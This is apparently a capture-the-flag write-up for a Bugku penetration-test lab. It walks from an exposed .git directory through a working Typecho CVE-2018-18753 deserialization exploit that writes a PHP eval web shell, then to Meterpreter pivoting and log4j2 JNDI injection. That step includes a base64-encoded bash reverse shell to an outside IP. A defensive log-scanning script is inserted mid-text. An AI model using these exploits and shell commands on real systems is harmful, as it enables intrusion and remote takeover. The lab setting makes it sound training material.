Target Machine Penetration: Penetration Test 2 | 风尘孤狼

Target Machine Penetration: Penetration Test 2

bugku PAR: Penetration Test 2

Penetration Test 2 (unsolved)
Number of flags: 9
Description: During a penetration test, Xiaoming got into a website's admin backend but ran out of ideas on how to continue. Can you help them?

We start with a single address: http://106.14.195.228:80


The site exposes its .git directory, so the source code can be recovered:

C:\Users\25963\Desktop\GitHack-master>python GitHack.py -u http://106.14.195.228/.git/
[+] Download and parse index file ...
[+] LICENSE
[+] README.md
[+] index.php
[+] logo.png
[+] phpinfo.php
[OK] README.md
[OK] LICENSE
[OK] phpinfo.php
[OK] index.php
[OK] logo.png

Directory scan results:

[02:27:19] 301 -  314B  - /.git  ->  http://106.14.195.228/.git/            
[02:27:19] 200 -  599B  - /.git/                                            
[02:27:19] 200 -  272B  - /.git/config
[02:27:19] 200 -   23B  - /.git/HEAD                                        
[02:27:19] 200 -  413B  - /.git/branches/
[02:27:19] 200 -   73B  - /.git/description
[02:27:19] 200 -  595B  - /.git/hooks/                                      
[02:27:19] 200 -  400B  - /.git/index                                       
[02:27:19] 200 -  240B  - /.git/info/exclude                                
[02:27:19] 200 -  459B  - /.git/info/
[02:27:19] 200 -  191B  - /.git/logs/HEAD                                   
[02:27:19] 200 -  481B  - /.git/logs/
[02:27:19] 301 -  324B  - /.git/logs/refs  ->  http://106.14.195.228/.git/logs/refs/
[02:27:19] 301 -  330B  - /.git/logs/refs/heads  ->  http://106.14.195.228/.git/logs/refs/heads/
[02:27:19] 200 -  191B  - /.git/logs/refs/heads/master
[02:27:19] 301 -  332B  - /.git/logs/refs/remotes  ->  http://106.14.195.228/.git/logs/refs/remotes/
[02:27:19] 200 -  191B  - /.git/logs/refs/remotes/origin/HEAD               
[02:27:19] 200 -  107B  - /.git/packed-refs
[02:27:19] 200 -  543B  - /.git/objects/                                    
[02:27:19] 301 -  325B  - /.git/refs/heads  ->  http://106.14.195.228/.git/refs/heads/
[02:27:19] 200 -   41B  - /.git/refs/heads/master
[02:27:19] 301 -  327B  - /.git/refs/remotes  ->  http://106.14.195.228/.git/refs/remotes/
[02:27:19] 301 -  334B  - /.git/refs/remotes/origin  ->  http://106.14.195.228/.git/refs/remotes/origin/
[02:27:19] 200 -   32B  - /.git/refs/remotes/origin/HEAD
[02:27:19] 301 -  324B  - /.git/refs/tags  ->  http://106.14.195.228/.git/refs/tags/
[02:27:19] 200 -  473B  - /.git/refs/                                                                               
[02:27:26] 301 -  315B  - /admin  ->  http://106.14.195.228/admin/          
[02:27:26] 302 -    0B  - /admin/  ->  http://106.14.195.228/admin/login.php?referer=http%3A%2F%2F106.14.195.228%2Fadmin%2F
[02:27:26] 200 -    0B  - /admin/config.php                                 
[02:27:27] 302 -    0B  - /admin/index.php  ->  http://106.14.195.228/admin/login.php?referer=http%3A%2F%2F106.14.195.228%2Fadmin%2Findex.php
[02:27:27] 200 -    2KB - /admin/login.php                                  
[02:27:38] 200 -    0B  - /config.inc.php                                                                 
[02:27:48] 301 -  317B  - /install  ->  http://106.14.195.228/install/      
[02:27:48] 200 -    0B  - /install.php                                      
[02:27:48] 200 -    0B  - /install.php?profile=default                      
[02:27:48] 200 -  530B  - /install/                                         
[02:27:50] 200 -   10KB - /LICENSE                                          
[02:27:50] 200 -    6KB - /license                                          
[02:27:50] 200 -    6KB - /license.txt                                      
[02:27:51] 200 -   14KB - /logo                                             
[02:27:57] 200 -   18KB - /phpinfo.php                                      
[02:28:01] 200 -   79B  - /README.md                                                                                             
[02:28:12] 301 -  313B  - /usr  ->  http://106.14.195.228/usr/              
[02:28:12] 200 -  484B  - /usr/                                             
[02:28:12] 301 -  313B  - /var  ->  http://106.14.195.228/var/              
[02:28:12] 200 -  618B  - /var/

The admin backend is at /admin/.


The backend runs the Typecho 1.0 framework, which is affected by the CVE-2018-18753 deserialization vulnerability.


exp:

<?php
class Typecho_Feed
{
    const RSS1 = 'RSS 1.0';
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';
    const DATE_RFC822 = 'r';
    const DATE_W3CDTF = 'c';
    const EOL = "\n";
    private $_type;
    private $_items;

    public function __construct(){
        $this->_type = $this::RSS2;
        $this->_items[0] = array(
            'title' => '1',
            'link' => '1',
            'date' => 1508895132,
            'category' => array(new Typecho_Request()),
            'author' => new Typecho_Request(),
        );
    }
}
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();
    public function __construct(){
        $this->_params['screenName'] = 'echo "<?php @eval(\$_POST[1]);?>" > 1.php';
        $this->_filter[0] = 'system';
    }
}

$exp = array(
    'adapter' => new Typecho_Feed(),
    'prefix' => 'typecho_'
);

echo base64_encode(serialize($exp));
?>
GET: http://47.102.44.129/install.php?finish=a
POST body: __typecho_config=<base64 string printed by the script above>

flag1 is in the web root: flag{e0d9924caeecfabdb07b9c90fb60e959}


The MySQL database uses a weak password.


That gives flag2: flag{aa5c89083bd3836e7c86ef0a2d8681fa}

It also yields the backend admin credentials admin/$P$BfY8rUZyXxJy5AeWCVphCYzYR3tZ9I1. The password is hashed and I didn't look up the hashing scheme; since we already have a shell, this box is done. Upload fscan and scan the /24 segment:

192.168.0.2:3306 open
192.168.0.2:80 open
[*] WebTitle: http://192.168.0.2        code:200 len:3392   title:Harry's Blog
[+] mysql:192.168.0.2:3306:root 
192.168.0.2:3306 open
192.168.0.3:80 open
192.168.0.2:80 open
192.168.0.1:80 open
192.168.0.1:22 open
[*] WebTitle: http://192.168.0.1        code:200 len:3392   title:Harry's Blog
[*] WebTitle: http://192.168.0.2        code:200 len:3392   title:Harry's Blog
[*] WebTitle: http://192.168.0.3        code:200 len:4789   title:Bugku后台管理系统
[+] mysql:192.168.0.2:3306:root

Generate an msf payload and set up a pivot through the compromised host.


Add a route to the internal segment:

meterpreter > run autoroute -s 192.168.0.0

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.0.0/255.255.255.0...
[+] Added route to 192.168.0.0/255.255.255.0 via 106.14.195.228
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.0.0        255.255.255.0      Session 1

192.168.0.3 is now reachable through the pivot.


A directory scan turned up nothing of note.

One drawback I found with msf's pivot is that it cannot take much traffic; otherwise the session simply dies. So I switched to frp for the directory scan: directory brute-forcing generates too much traffic and msf breaks.

Capturing the login request reveals a hint in a Source response header:


Downloading the source from that path shows the application is written in Java.


Log4j2CtfApplication.java

package com.example.log4j2ctf;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

@SpringBootApplication
public class Log4j2CtfApplication {

    public static void main(String[] args) {
        SpringApplication.run(Log4j2CtfApplication.class, args);
    }

}

DamnVulnerableLog4j.java

package com.example.log4j2ctf.controller;

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RestController;

import javax.servlet.http.HttpServletResponse;

@RestController
public class DamnVulnerableLog4j {

    private final Logger logger = LoggerFactory.getLogger(this.getClass());
    private int count = 0;

    @PostMapping("/login")
    public String login(String user, String pwd, HttpServletResponse response) {
        response.addHeader("Source", "/source.zip");
        /*
         *
         *
         */
        logger.info("用户登录失败,用户名不存在:" + user);

        return "用户名或密码错误,次数 " + (count++);
    }

}

The file name makes it obvious that this is the log4j2 vulnerability.

The username field is logged unsanitised, so an rmi/ldap JNDI lookup string can be injected there; the dependency list also shows the application is built on Spring Boot.

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS43MC4yNDEuMjExLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "81.70.241.211"
${jndi:rmi://81.70.241.211:1099/igsfwb}
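As an added example (not part of the original writeup), here is a small Python detector that a defender could run over web-server access logs and application logs to flag the two indicators this writeup relies on: probing of an exposed /.git/ directory (the GitHack/dirsearch stage above) and Log4j 2 `${jndi:...}` lookup strings in logged user input (this stage), including the nested lookup wrappers that defeat a naive substring match. All log lines below are constructed.

```python
import re

# Constructed sample lines (not from the page): two web-server access-log
# entries and three application-log entries from a login handler.
SAMPLE_LINES = [
    '10.0.0.5 - - [25/Feb/2024:15:27:19 +0800] "GET /.git/HEAD HTTP/1.1" 200 23',
    '10.0.0.5 - - [25/Feb/2024:15:27:19 +0800] "GET /.github/workflows/ci.yml HTTP/1.1" 404 0',
    '2024-02-25 16:29:18 INFO  DamnVulnerableLog4j - login failed, user: alice',
    '2024-02-25 16:29:20 INFO  DamnVulnerableLog4j - login failed, user: ${jndi:rmi://198.51.100.10:1099/x}',
    '2024-02-25 16:29:22 INFO  DamnVulnerableLog4j - login failed, user: ${${lower:j}ndi:ldap://198.51.100.10/a}',
]

# Requests for anything directly under /.git/ (HEAD, index, config, objects...);
# "/.github/..." deliberately does not match.
GIT_PROBE = re.compile(r'"(?:GET|HEAD|POST)\s+/\.git(?:/|\s)')

# Log4j 2 lookup wrappers that get nested inside ${jndi:...} to break plain
# string matching: ${lower:j}, ${upper:N} and the default-value form ${::-j}.
_CASE_WRAPPER = re.compile(r'\$\{(?:lower|upper):([^{}]*)\}', re.IGNORECASE)
_DEFAULT_WRAPPER = re.compile(r'\$\{[^{}]*?:-([^{}]*)\}')
JNDI_LOOKUP = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def normalise_lookups(text: str) -> str:
    """Collapse nested lookup wrappers, innermost first, until nothing changes.
    Letter case is left alone because the final match is case-insensitive."""
    while True:
        new = _CASE_WRAPPER.sub(lambda m: m.group(1), text)
        new = _DEFAULT_WRAPPER.sub(lambda m: m.group(1), new)
        if new == text:
            return new
        text = new


def classify_line(line: str):
    """Return 'git-probe', 'jndi-lookup' or None for one log line."""
    if GIT_PROBE.search(line):
        return "git-probe"
    if JNDI_LOOKUP.search(normalise_lookups(line)):
        return "jndi-lookup"
    return None


def scan(lines):
    """Return (line number, finding) pairs for every suspicious line."""
    return [(i, kind) for i, l in enumerate(lines, 1) if (kind := classify_line(l))]


if __name__ == "__main__":
    for lineno, kind in scan(SAMPLE_LINES):
        print(f"line {lineno}: {kind}")
```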

flag4:flag{a98b304c5ce272cd586da15874ef4e79}

/root/flag

flag5:flag{2a57c5c9e6b970f674b33b574ee30db5}


/proc/self/environ

flag3:flag{e0f92293345ebeb6687d93341afcf402}


The host has multiple network interfaces, so there is another segment behind it:

root@44e217274d66:/# ip add
ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
9: eth0@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:c0:a8:00:03 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 192.168.0.3/24 brd 192.168.0.255 scope global eth0
       valid_lft forever preferred_lft forever
15: eth1@if16: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:c0:a8:01:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 192.168.1.2/24 brd 192.168.1.255 scope global eth1
       valid_lft forever preferred_lft forever

First get a shell from this host back into msf.


Then add a route to the new segment.


The server is too weak... I ended up exhausting its memory, so I'll come back to it another time.
